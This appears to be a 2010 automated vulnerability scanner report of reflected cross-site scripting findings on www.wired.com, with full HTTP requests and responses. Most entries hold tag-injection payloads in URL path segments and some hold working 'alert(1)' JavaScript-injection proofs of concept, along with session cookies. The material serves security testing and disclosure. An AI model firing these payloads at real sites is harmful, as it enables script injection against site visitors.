GET /science/discoveriese528a"><a>b36f778d09a/news/2009/03/dayintech_0331 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:42 GMT Date: Sun, 21 Nov 2010 23:12:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriese528a"><a>b36f778d09a c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa656"><a>9f2efb39a57 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsaa656"><a>9f2efb39a57/2009/03/dayintech_0331 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:53 GMT Date: Sun, 21 Nov 2010 23:12:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsaa656"><a>9f2efb39a57"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27c21"><a>ee25f07f338 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science27c21"><a>ee25f07f338/discoveries/news/2009/04/dayintech_0408 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:16:30 GMT Date: Sun, 21 Nov 2010 23:12:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science27c21"><a>ee25f07f338 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1af11"><a>b64fd6bf37a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries1af11"><a>b64fd6bf37a/news/2009/04/dayintech_0408 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=590 Expires: Sun, 21 Nov 2010 23:22:35 GMT Date: Sun, 21 Nov 2010 23:12:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries1af11"><a>b64fd6bf37a c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3001f"><a>f33ebe8dd11 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news3001f"><a>f33ebe8dd11/2009/04/dayintech_0408 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=542 Expires: Sun, 21 Nov 2010 23:21:58 GMT Date: Sun, 21 Nov 2010 23:12:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news3001f"><a>f33ebe8dd11"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9af6"><a>58d5798a2e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencea9af6"><a>58d5798a2e1/planetearth HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29286 Vary: Accept-Encoding Cache-Control: max-age=216 Expires: Sun, 21 Nov 2010 23:12:53 GMT Date: Sun, 21 Nov 2010 23:09:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencea9af6"><a>58d5798a2e1 ss_planetearth"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d4aa"><a>dad91b2864b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/planetearth1d4aa"><a>dad91b2864b HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29286 Vary: Accept-Encoding Cache-Control: max-age=591 Expires: Sun, 21 Nov 2010 23:19:31 GMT Date: Sun, 21 Nov 2010 23:09:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_planetearth1d4aa"><a>dad91b2864b"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dfa3"><a>00c4df6c89f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science2dfa3"><a>00c4df6c89f/space HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29274 Vary: Accept-Encoding Cache-Control: max-age=220 Expires: Sun, 21 Nov 2010 23:13:00 GMT Date: Sun, 21 Nov 2010 23:09:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science2dfa3"><a>00c4df6c89f ss_space"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19e09"><a>ac805a603f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/space19e09"><a>ac805a603f2 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29274 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:49 GMT Date: Sun, 21 Nov 2010 23:09:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_space19e09"><a>ac805a603f2"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd674"><a>362856281e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /searchcd674"><a>362856281e6 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29325 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:13:49 GMT Date: Mon, 22 Nov 2010 01:09:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_searchcd674"><a>362856281e6"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2a40"><a>d195687ec69 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /servicesd2a40"><a>d195687ec69/corrections/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29357 Vary: Accept-Encoding Cache-Control: max-age=225 Expires: Mon, 22 Nov 2010 01:12:27 GMT Date: Mon, 22 Nov 2010 01:08:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_servicesd2a40"><a>d195687ec69 ss_corrections"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20746"><a>2a57fa204b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/corrections20746"><a>2a57fa204b8/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29357 Vary: Accept-Encoding Expires: Mon, 22 Nov 2010 01:09:18 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_corrections20746"><a>2a57fa204b8"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abe3c"><a>0650befcdcc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /servicesabe3c"><a>0650befcdcc/email/culture/art/multimedia/2008/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29317 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 22:18:42 GMT Date: Sun, 21 Nov 2010 22:08:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_servicesabe3c"><a>0650befcdcc ss_email c_culture"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c62"><a>f4dab07ffe9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/email99c62"><a>f4dab07ffe9/culture/art/multimedia/2008/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29317 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 22:19:04 GMT Date: Sun, 21 Nov 2010 22:09:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_email99c62"><a>f4dab07ffe9 c_culture"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c7bc"-alert(1)-"baa07cebf20 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/email/culture8c7bc"-alert(1)-"baa07cebf20/art/multimedia/2008/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Pragma: no-cache Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store Expires: Sun, 21 Nov 2010 22:09:31 GMT Date: Sun, 21 Nov 2010 22:09:31 GMT Content-Length: 32230 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f88b"><a>d314e13f6a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/email/culture4f88b"><a>d314e13f6a1/art/multimedia/2008/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Pragma: no-cache Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store Expires: Sun, 21 Nov 2010 22:09:24 GMT Date: Sun, 21 Nov 2010 22:09:24 GMT Content-Length: 32216 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml ...[SNIP]... <body class="s_services ss_email c_culture4f88b"><a>d314e13f6a1"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69f26"-alert(1)-"7b4c9190c10 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/email/culture/art69f26"-alert(1)-"7b4c9190c10/multimedia/2008/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Pragma: no-cache Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store Expires: Sun, 21 Nov 2010 22:09:32 GMT Date: Sun, 21 Nov 2010 22:09:32 GMT Content-Length: 32202 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fa5c"-alert(1)-"e70c417b07a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/email/culture/art/multimedia8fa5c"-alert(1)-"e70c417b07a/2008/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Pragma: no-cache Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store Expires: Sun, 21 Nov 2010 22:09:33 GMT Date: Sun, 21 Nov 2010 22:09:33 GMT Content-Length: 32202 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml ...[SNIP]... <script type="text/javascript">
